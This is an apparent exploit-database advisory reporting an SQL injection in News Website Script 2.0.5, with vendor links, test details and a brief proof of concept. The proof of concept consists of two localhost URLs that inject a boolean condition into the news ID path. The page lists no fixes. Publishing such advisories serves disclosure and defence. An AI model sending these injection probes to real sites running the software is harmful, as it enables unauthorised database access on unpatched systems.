News Website Script 2.0.5 - SQL Injection

2019-02-25 14:05:06

# Exploit Title: News Website Script 2.0.5 - SQL Injection
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 22, 2019
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link : https://www.phpscriptsmall.com/product/news-website-script/
# Tested Version: 2.0.5
# Tested on: Kali linux, Windows 8.1


# PoC:

# http://localhost/[PATH]/index.php/show/news/11 [SQL]/

# http://localhost/[PATH]/index.php/show/news/11 and 1=0/Sports/january-25-2018/Pogba-still-has-to-improve-Allegri

Fixes

No fixes

In order to submit a new fix you need to be registered.